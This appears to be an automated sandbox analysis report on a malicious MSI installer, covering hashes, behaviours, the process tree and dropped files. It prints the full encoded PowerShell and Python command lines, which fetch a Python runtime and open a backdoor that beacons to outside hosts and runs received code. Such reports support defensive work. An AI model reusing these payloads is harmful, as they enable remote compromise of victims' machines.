f6b71317e15b0fe5dd80e6dbddf09e7935c270eeb13c2cd90cec12b069359255

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20231130-en
resource tags

arch:x64arch:x86image:win10v2004-20231130-enlocale:en-usos:windows10-2004-x64system
submitted
11-12-2023 07:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

install.msi
Size

1.1MB
MD5

177233c88c71a12b6dd192ad1cda735f
SHA1

fa36613e47fe2bf72657767ba87f9ab6a86bc9ca
SHA256

f6b71317e15b0fe5dd80e6dbddf09e7935c270eeb13c2cd90cec12b069359255
SHA512

003677a6da400545b24518c0a70138a8eae0fbe46e47ebb88b6d016291aeb2703c31fb8a4260d19f02e6029ba9249df6d007c22e54ef3d6bd94267f58c154c7e
SSDEEP

24576:3sIYKztdfG8NQGafAdbe/IEFXsaV5C7eYVLsTPRDKe:3sIYefNQGoAhRaV5C77yPROe

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
34	4896	powershell.exe
37	4896	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1668	python.exe

Loads dropped DLL 10 IoCs

pid	Process
540	MsiExec.exe
540	MsiExec.exe
540	MsiExec.exe
540	MsiExec.exe
540	MsiExec.exe
1668	python.exe
1668	python.exe
1668	python.exe
1668	python.exe
1668	python.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{5432C7C9-ACEB-47AC-AA8E-8CBCEB2EC2CA}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI43A4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI43D4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e5741cc.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI420A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI42E6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4336.tmp	msiexec.exe
File created	C:\Windows\Installer\e5741cc.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4316.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

Checks processor information in registry 2 TTPs 1 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	python.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3120	msiexec.exe
3120	msiexec.exe
1612	powershell.exe
1612	powershell.exe
4896	powershell.exe
4896	powershell.exe

Suspicious use of AdjustPrivilegeToken 52 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3276	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3276	msiexec.exe
Token: SeSecurityPrivilege	3120	msiexec.exe
Token: SeCreateTokenPrivilege	3276	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3276	msiexec.exe
Token: SeLockMemoryPrivilege	3276	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3276	msiexec.exe
Token: SeMachineAccountPrivilege	3276	msiexec.exe
Token: SeTcbPrivilege	3276	msiexec.exe
Token: SeSecurityPrivilege	3276	msiexec.exe
Token: SeTakeOwnershipPrivilege	3276	msiexec.exe
Token: SeLoadDriverPrivilege	3276	msiexec.exe
Token: SeSystemProfilePrivilege	3276	msiexec.exe
Token: SeSystemtimePrivilege	3276	msiexec.exe
Token: SeProfSingleProcessPrivilege	3276	msiexec.exe
Token: SeIncBasePriorityPrivilege	3276	msiexec.exe
Token: SeCreatePagefilePrivilege	3276	msiexec.exe
Token: SeCreatePermanentPrivilege	3276	msiexec.exe
Token: SeBackupPrivilege	3276	msiexec.exe
Token: SeRestorePrivilege	3276	msiexec.exe
Token: SeShutdownPrivilege	3276	msiexec.exe
Token: SeDebugPrivilege	3276	msiexec.exe
Token: SeAuditPrivilege	3276	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3276	msiexec.exe
Token: SeChangeNotifyPrivilege	3276	msiexec.exe
Token: SeRemoteShutdownPrivilege	3276	msiexec.exe
Token: SeUndockPrivilege	3276	msiexec.exe
Token: SeSyncAgentPrivilege	3276	msiexec.exe
Token: SeEnableDelegationPrivilege	3276	msiexec.exe
Token: SeManageVolumePrivilege	3276	msiexec.exe
Token: SeImpersonatePrivilege	3276	msiexec.exe
Token: SeCreateGlobalPrivilege	3276	msiexec.exe
Token: SeRestorePrivilege	3120	msiexec.exe
Token: SeTakeOwnershipPrivilege	3120	msiexec.exe
Token: SeRestorePrivilege	3120	msiexec.exe
Token: SeTakeOwnershipPrivilege	3120	msiexec.exe
Token: SeRestorePrivilege	3120	msiexec.exe
Token: SeTakeOwnershipPrivilege	3120	msiexec.exe
Token: SeRestorePrivilege	3120	msiexec.exe
Token: SeTakeOwnershipPrivilege	3120	msiexec.exe
Token: SeRestorePrivilege	3120	msiexec.exe
Token: SeTakeOwnershipPrivilege	3120	msiexec.exe
Token: SeRestorePrivilege	3120	msiexec.exe
Token: SeTakeOwnershipPrivilege	3120	msiexec.exe
Token: SeRestorePrivilege	3120	msiexec.exe
Token: SeTakeOwnershipPrivilege	3120	msiexec.exe
Token: SeRestorePrivilege	3120	msiexec.exe
Token: SeTakeOwnershipPrivilege	3120	msiexec.exe
Token: SeRestorePrivilege	3120	msiexec.exe
Token: SeTakeOwnershipPrivilege	3120	msiexec.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	4896	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3276	msiexec.exe
3276	msiexec.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 3120 wrote to memory of 540	3120	msiexec.exe	34
PID 3120 wrote to memory of 540	3120	msiexec.exe	34
PID 3120 wrote to memory of 540	3120	msiexec.exe	34
PID 540 wrote to memory of 1612	540	MsiExec.exe	45
PID 540 wrote to memory of 1612	540	MsiExec.exe	45
PID 540 wrote to memory of 1612	540	MsiExec.exe	45
PID 1612 wrote to memory of 4896	1612	powershell.exe	51
PID 1612 wrote to memory of 4896	1612	powershell.exe	51
PID 1612 wrote to memory of 4896	1612	powershell.exe	51
PID 4896 wrote to memory of 3556	4896	powershell.exe	87
PID 4896 wrote to memory of 3556	4896	powershell.exe	87
PID 4896 wrote to memory of 3556	4896	powershell.exe	87
PID 4896 wrote to memory of 1668	4896	powershell.exe	109
PID 4896 wrote to memory of 1668	4896	powershell.exe	109
PID 4896 wrote to memory of 1668	4896	powershell.exe	109

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3276

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3120
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 2150DAFA7D5430011DDF6E3B8D312A24
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:540
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss43E1.ps1"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1612
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e CgAjACAAQgBsAG8AYwBrACAAZgBvAHIAIABkAGUAYwBsAGEAcgBpAG4AZwAgAHQAaABlACAAcwBjAHIAaQBwAHQAIABwAGEAcgBhAG0AZQB0AGUAcgBzAC4ACgBQAGEAcgBhAG0AKAApAAoACgBjAGQAIAAkAEUATgBWADoAcAB1AGIAbABpAGMACgAkAEYAbwBsAGQAZQByACAAPQAgACIAJAB7AEUATgBWADoAcAB1AGIAbABpAGMAfQBcAHAAZQBmAGkAbABlAC0AMgAwADIAMwAuADIALgA3ACIACgAkAEYAbwBsAGQAZQByADIAIAA9ACAAIgAkAHsARQBOAFYAOgBwAHUAYgBsAGkAYwB9AFwAcAB5AHQAaABvAG4AIgAKAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABGAG8AbABkAGUAcgAyACAALQBQAGEAdABoAFQAeQBwAGUAIABDAG8AbgB0AGEAaQBuAGUAcgApACkAIAB7AAoAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAcwAuAHAAeQB0AGgAbwBuAGgAbwBzAHQAZQBkAC4AbwByAGcALwBwAGEAYwBrAGEAZwBlAHMALwA3ADgALwBjADUALwAzAGIAMwBjADYAMgAyADIAMwBmADcAMgBlADIAMwA2ADAANwAzADcAZgBkADIAYQA1ADcAYwAzADAAZQA1AGIAMgBhAGQAZQBjAGQAOAA1AGUANwAwADIANwA2ADgANwA5ADYAMAA5AGEANwA0ADAAMwAzADMANAAvAHAAZQBmAGkAbABlAC0AMgAwADIAMwAuADIALgA3AC4AdABhAHIALgBnAHoAIAAtAE8AdQB0AEYAaQBsAGUAIABwAGUAZgBpAGwAZQAuAHQAYQByAC4AZwB6AAoAIAAgACAAIAB0AGEAcgAgAC0AeAB2AHoAZgAgAHAAZQBmAGkAbABlAC4AdABhAHIALgBnAHoAOwAKACAAIAAgACAAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABGAG8AbABkAGUAcgAgACIAcAB5AHQAaABvAG4AIgAKACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAFIASQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAeQB0AGgAbwBuAC4AbwByAGcALwBmAHQAcAAvAHAAeQB0AGgAbwBuAC8AMwAuADkALgA2AC8AcAB5AHQAaABvAG4ALQAzAC4AOQAuADYALQBlAG0AYgBlAGQALQB3AGkAbgAzADIALgB6AGkAcAAgAC0ATwB1AHQARgBpAGwAZQAgAHAAeQB0AGgAbwBuAC4AegBpAHAAOwAKACAAIAAgACAARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAcAB5AHQAaABvAG4ALgB6AGkAcAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIABwAHkAdABoAG8AbgA7AAoAfQAKAC4AXABwAHkAdABoAG8AbgBcAHAAeQB0AGgAbwBuAC4AZQB4AGUAIAAtAGMAIAAiACIAIgBpAG0AcABvAHIAdAAgAGIAYQBzAGUANgA0ADsAIABlAHgAZQBjACgAYgBhAHMAZQA2ADQALgBiADYANABkAGUAYwBvAGQAZQAoACcAYgBTAEEAOQBJAEMAYwAwAE0AVABJADAATQBUAGcAMQBOAGoAZwAxAE4AegBBAG4AQwBtAFoAeQBiADIAMABnAGQARwBsAHQAWgBTAEIAcABiAFgAQgB2AGMAbgBRAGcAYwAyAHgAbABaAFgAQQBLAGMAMgB4AGwAWgBYAEEAbwBOAGoAQQBwAEMAbQBsAHQAYwBHADkAeQBkAEMAQgBpAFkAWABOAGwATgBqAFEAZwBZAFgATQBnAFkAZwBwAHAAYgBYAEIAdgBjAG4AUQBnAGMAMgA5AGoAYQAyAFYAMABJAEcARgB6AEkASABOAHoAQwBtAFoAeQBiADIAMABnAGMAbQBGAHUAWgBHADkAdABJAEcAbAB0AGMARwA5AHkAZABDAEIAagBhAEcAOQBwAFkAMgBVAEsAYQBXADEAdwBiADMASgAwAEkASABkAHAAYgBuAEoAbABaAHkAQgBoAGMAeQBCADMAQwBtAFIAbABaAGkAQgB3AEsARwBNAHMASQBHADQAcABPAGcAbwBnAEkAQwBBAGcAYwB6AEkAZwBQAFMAQgAzAEwAawA5AHcAWgBXADUATABaAFgAawBvAGQAeQA1AEkAUwAwAFYAWgBYADAAeABQAFEAMABGAE0AWAAwADEAQgBRADAAaABKAFQAawBVAHMASQBHAE0AcABDAGkAQQBnAEkAQwBCAHkAWgBYAFIAMQBjAG0ANABnAGQAeQA1AFIAZABXAFYAeQBlAFYAWgBoAGIASABWAGwAUgBYAGcAbwBjAHoASQBzAEkARwA0AHAAVwB6AEIAZABDAG4AQgB5AEkARAAwAGcAYwBDAGgAeQBKADAAaABCAFUAawBSAFgAUQBWAEoARgBYAEYAeABFAFIAVgBOAEQAVQBrAGwAUQBWAEUAbABQAFQAbAB4AGMAVQAzAGwAegBkAEcAVgB0AFgARgB4AEQAWgBXADUAMABjAG0ARgBzAFUASABKAHYAWQAyAFYAegBjADIAOQB5AFgARgB3AHcASgB5AHcAZwBKADEAQgB5AGIAMgBOAGwAYwAzAE4AdgBjAGsANQBoAGIAVwBWAFQAZABIAEoAcABiAG0AYwBuAEsAUQBwADIAYwB5AEEAOQBJAEgAQQBvAGMAaQBkAFQAVAAwAFoAVQBWADAARgBTAFIAVgB4AGMAVABXAGwAagBjAG0AOQB6AGIAMgBaADAAWABGAHgAWABhAFcANQBrAGIAMwBkAHoASQBFADUAVQBYAEYAeABEAGQAWABKAHkAWgBXADUAMABWAG0AVgB5AGMAMgBsAHYAYgBpAGMAcwBJAEMAZABRAGMAbQA5AGsAZABXAE4AMABUAG0ARgB0AFoAUwBjAHAAQwBtAFoAegBJAEQAMABnAEoAeQA1AGkAYwBtAEYANgBhAFcAeAB6AGIAMwBWADAAYQBDADUAagBiAEcAOQAxAFoARwBGAHcAYwBDADUAaABlAG4AVgB5AFoAUwA1AGoAYgAyADAAbgBDAG0AeABzAEkARAAwAGcAVwAyAFkAbgBhADIAWQAwAFoAbQBvADUATQBuAHAAbQBhADIAbwA1AE0AbgB0AG0AYwAzADAAbgBMAEMAQgBtAEoAMgBaAHIAYQBqAGsANQBNADMAbABtAE0AegBrAHoATQAzAHQAbQBjADMAMABuAEwAQwBCAG0ASgAyAGQAbgBOAEQAawA0AGEAbQBoAG8ATQBuAGcANQBOAEQATQAwAGUAMgBaAHoAZgBTAGMAcwBJAEcAWQBuAGEARwBnADEATwBEAE0ANQBNAEQAQQAwAGEAbQBoADcAWgBuAE4AOQBKAHkAdwBnAFoAaQBkAHAAWQBuAE0AeABNAFgAaAByAFoARABnADUATgBEAE4ANwBaAG4ATgA5AEoAeQB3AGcAWgBpAGQAegBhADIAWgBxAE0AagBSADEAZABUAEkANQBaAG0AUgByAGEAagBSAHIAYQBuAHQAbQBjADMAMABuAFgAUQBwAGwAWgBTAEEAOQBJAEUAWgBoAGIASABOAGwAQwBuAGQAbwBhAFcAeABsAEkARgBSAHkAZABXAFUANgBDAGkAQQBnAEkAQwBCAHAAWgBpAEEAbgBRAG4ASgB2AFkAVwBSADMAWgBXAHgAcwBKAHkAQgBwAGIAaQBCAHcAYwBqAG8ASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAaQBjAG0AVgBoAGEAdwBvAGcASQBDAEEAZwBaAG0AOQB5AEkARwB3AGcAYQBXADQAZwBiAEcAdwA2AEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAGQASABKADUATwBnAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgAzAGEAWABSAG8ASQBIAE4AegBMAG4ATgB2AFkAMgB0AGwAZABDAGgAegBjAHkANQBCAFIAbAA5AEoAVABrAFYAVQBMAEMAQgB6AGMAeQA1AFQAVAAwAE4ATABYADEATgBVAFUAawBWAEIAVABTAGsAZwBZAFgATQBnAGMAegBvAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkASABNAHUAWQAyADkAdQBiAG0AVgBqAGQAQwBnAG8AWgBpAGQANwBiAEgAMABuAEwAQwBCAGoAYQBHADkAcABZADIAVQBvAFcAegBNADQATQBqAEUAcwBJAEQAUQAwAE0AVABnAHMASQBEAFUAeABOAHoAZwBzAEkARABrADUATwBEAE0AcwBJAEQAYwB6AE0AVABFAHMASQBEAGcAeQBPAFQAUQBzAEkARABZAHkATgB6AE0AcwBJAEQASQB4AE0AVABrAHMASQBEAEUAdwBNAFQAZwBzAEkARABFADMATQBEAEYAZABLAFMAawBwAEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB6AEwAbgBOAGwAYgBtAFEAbwBaAGkAZAB3AGUAVQBOAHYAWgBHAFUAZwBMAFMAQgA3AGMAMwBNAHUAWgAyAFYAMABhAEcAOQB6AGQARwA1AGgAYgBXAFUAbwBLAFgAMABnAGYAQwBCADcAZABuAE4AOQBJAEgAdwBnAGUAMwBCAHkAZgBTAGMAdQBaAFcANQBqAGIAMgBSAGwASwBDAGsAcABDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAawBkAEMAQQA5AEkASABNAHUAYwBtAFYAagBkAGkAZwAyAE4AVABVAHoATgBpAGsAdQBaAEcAVgBqAGIAMgBSAGwASwBDAGsASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBHAFYANABaAFcATQBvAFkAaQA1AGkATgBqAFIAawBaAFcATgB2AFoARwBVAG8AYwAzAFIAeQBLAEcAUgAwAEsAUwBrAHAAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCAHoATABtAE4AcwBiADMATgBsAEsAQwBrAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkARwBWAGwASQBEADAAZwBWAEgASgAxAFoAUQBvAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAFkAbgBKAGwAWQBXAHMASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAbABlAEcATgBsAGMASABRADYAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEgAQgBoAGMAMwBNAEsASQBDAEEAZwBJAEcAeABzAEwAbQBGAHcAYwBHAFYAdQBaAEMAZwBuAFkAMgBGAHQAWgBYAEoAaABMAFcAVgB0AGMASABKAGwAYwAyAEUAdQBZAFcATgBqAFoAWABOAHoAWQAyAEYAdABMAG0AOQB5AFoAeQBjAHAAQwBpAEEAZwBJAEMAQgBwAFoAaQBCAGwAWgBUAG8ASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAaQBjAG0AVgBoAGEAdwA9AD0AJwApACkAOwAgAGUAeABpAHQAKAApACIAIgAiADsACgA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4896
    - - C:\Windows\SysWOW64\tar.exe
        
        "C:\Windows\system32\tar.exe" -xvzf pefile.tar.gz
        5⤵
        
        PID:3556
    - - C:\Users\Public\python\python.exe
        
        "C:\Users\Public\python\python.exe" -c "import base64; exec(base64.b64decode('bSA9ICc0MTI0MTg1Njg1NzAnCmZyb20gdGltZSBpbXBvcnQgc2xlZXAKc2xlZXAoNjApCmltcG9ydCBiYXNlNjQgYXMgYgppbXBvcnQgc29ja2V0IGFzIHNzCmZyb20gcmFuZG9tIGltcG9ydCBjaG9pY2UKaW1wb3J0IHdpbnJlZyBhcyB3CmRlZiBwKGMsIG4pOgogICAgczIgPSB3Lk9wZW5LZXkody5IS0VZX0xPQ0FMX01BQ0hJTkUsIGMpCiAgICByZXR1cm4gdy5RdWVyeVZhbHVlRXgoczIsIG4pWzBdCnByID0gcChyJ0hBUkRXQVJFXFxERVNDUklQVElPTlxcU3lzdGVtXFxDZW50cmFsUHJvY2Vzc29yXFwwJywgJ1Byb2Nlc3Nvck5hbWVTdHJpbmcnKQp2cyA9IHAocidTT0ZUV0FSRVxcTWljcm9zb2Z0XFxXaW5kb3dzIE5UXFxDdXJyZW50VmVyc2lvbicsICdQcm9kdWN0TmFtZScpCmZzID0gJy5icmF6aWxzb3V0aC5jbG91ZGFwcC5henVyZS5jb20nCmxsID0gW2Yna2Y0Zmo5Mnpma2o5Mntmc30nLCBmJ2Zrajk5M3lmMzkzM3tmc30nLCBmJ2dnNDk4amhoMng5NDM0e2ZzfScsIGYnaGg1ODM5MDA0amh7ZnN9JywgZidpYnMxMXhrZDg5NDN7ZnN9JywgZidza2ZqMjR1dTI5ZmRrajRrantmc30nXQplZSA9IEZhbHNlCndoaWxlIFRydWU6CiAgICBpZiAnQnJvYWR3ZWxsJyBpbiBwcjoKICAgICAgICBicmVhawogICAgZm9yIGwgaW4gbGw6CiAgICAgICAgdHJ5OgogICAgICAgICAgICB3aXRoIHNzLnNvY2tldChzcy5BRl9JTkVULCBzcy5TT0NLX1NUUkVBTSkgYXMgczoKICAgICAgICAgICAgICAgIHMuY29ubmVjdCgoZid7bH0nLCBjaG9pY2UoWzM4MjEsIDQ0MTgsIDUxNzgsIDk5ODMsIDczMTEsIDgyOTQsIDYyNzMsIDIxMTksIDEwMTgsIDE3MDFdKSkpCiAgICAgICAgICAgICAgICBzLnNlbmQoZidweUNvZGUgLSB7c3MuZ2V0aG9zdG5hbWUoKX0gfCB7dnN9IHwge3ByfScuZW5jb2RlKCkpCiAgICAgICAgICAgICAgICBkdCA9IHMucmVjdig2NTUzNikuZGVjb2RlKCkKICAgICAgICAgICAgICAgIGV4ZWMoYi5iNjRkZWNvZGUoc3RyKGR0KSkpCiAgICAgICAgICAgICAgICBzLmNsb3NlKCkKICAgICAgICAgICAgICAgIGVlID0gVHJ1ZQogICAgICAgICAgICAgICAgYnJlYWsKICAgICAgICBleGNlcHQ6CiAgICAgICAgICAgIHBhc3MKICAgIGxsLmFwcGVuZCgnY2FtZXJhLWVtcHJlc2EuYWNjZXNzY2FtLm9yZycpCiAgICBpZiBlZToKICAgICAgICBicmVhaw==')); exit()"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:1668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e5741cf.rbs

Filesize
989B

MD5
aeb4d442e839bb49a4d7b32d4c6949fa

SHA1
58708d5097e723efc46ef015066c2293b7ca78fd

SHA256
467241060a89c729d472097d240ac629aeb58b2e55d98bb9ca0f4bf32119ea78

SHA512
7a045343f1e4746d4e2318b29668a19f19d62b77e37511437a74b05eda208c7db54af8391b1637d4af79b800f47fafad07954ed93af0d0d942ea92a06b0a7b7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
93152b0379180134a1f294b6424deb28

SHA1
ef4dfdc2cf91bb52aa5003920d6267713ce51f99

SHA256
1f1eab427892d197f85e16c45f9de14236a05a95c6277b8e3d4c6873657d9151

SHA512
1b6050e3e5ab0989e35d6146e54d00beba4140c6416cc169b88bafc50aa4258e35c94c5fdfc7a8b6b093cfcb0a1118e0139bf04b1bcd710497f3d9574e10ef8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
13KB

MD5
8477a73ec9bd7469f01e16f9ed280a47

SHA1
a9a05c8d1ef7ce35f1a2ea34bcdb48bded03dc6c

SHA256
5c6444872f1d4914e26c670eff136e9783a6e431f2b2b11f1328dbfa5eb3bc77

SHA512
0beeed2f70eaddb7b948cc6805746c0fa54f3a8e3bd1e7d3eb769716720ec74c762637087e821baa4d7db301bdf43eb495d373ac0dc184b13ca2ef094700038a

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI740f1.LOG

Filesize
20KB

MD5
cabd12cab9bee527606c1d08d404f828

SHA1
64fd63ab4097e12dddb15360abd12ccc2d1f6829

SHA256
077f6d314cceb6c8f6182641f7156081167ebb1bf94f44dd4ccb317b7662b9e6

SHA512
4ab878cbc36496f744b31197855cd295dfc133a9056f64af81140183c35be7fb0f4f38b00aa64ec9eed30e18b1e3133995348cb1caa1f395e53f2f3063937fb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w150xjmk.zdj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\pss43E0.ps1

Filesize
11KB

MD5
0b28a7441b8d4ff633cbc895a36e6158

SHA1
a4a74d76008bbb40b69fead1a63f9a5b3cd20c4e

SHA256
48722fa5b4613e2f7a0c9535c9d1401cdfde731bb51c78219a199600aa2f0a3c

SHA512
064247d610b3a3f76b9b821ce79a74533154fbc717c0e3473f598863bd9358404d983a22fd4a2131022fb0f86da588704cafece1969867407ad59771823a6a1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\pss43E1.ps1

Filesize
5KB

MD5
5c090162354c7d2079ac161e90791e3e

SHA1
b11c6dc5392c599d62bb12935af0ffd6fcbe0326

SHA256
87ca1260242bb80e4c2668dae092230623e09dd402b671b02a1085638a83a5da

SHA512
d68590d2f749e91ad16224d7eaad8cd4804b03c77ec4fb29cf0dcd99a966b1c6ba3db24c5e261cad0ed9977389dc34ee9ff4e0838e718d917490aebd07854fd3

Download Submit
C:\Users\Public\pefile.tar.gz

Filesize
73KB

MD5
fa0eba7c91f4e696771ddbfacdca25e4

SHA1
74b4c668e643f7cb8beb8128f5485fe709bef142

SHA256
82e6114004b3d6911c77c3953e3838654b04511b8b66e8583db70c65998017dc

SHA512
56cbfff3e6ffd07262d8a999358f2ddf2f6df7fff96ee647f94c57e791b278c9f9863aac92d0416fc3f7f2221652f8000a25d5f8f3233684b6bcec106df72fb4

Download Submit
C:\Users\Public\python\_socket.pyd

Filesize
69KB

MD5
d17542c811495295f808e8f847507b5a

SHA1
517c9b89e2734046214e73253f8a127374298e1d

SHA256
99fe82a75841db47d0842b15f855dcd59b258c5faf2094396741f32468286211

SHA512
affa357a639f512d2cf93a7d9fbf35565bc55f587a02004b661a3d604c3bb5f4ba8c7d646c3364d9a682264899768bcfcc76071b4856d14afa4a85cafa03fda7

Download Submit
C:\Users\Public\python\python.exe

Filesize
96KB

MD5
5acd2c21e08a164bcb87ce78f1ad6bf4

SHA1
9643c9cfd7094c669cf8f61dc01af84659de452b

SHA256
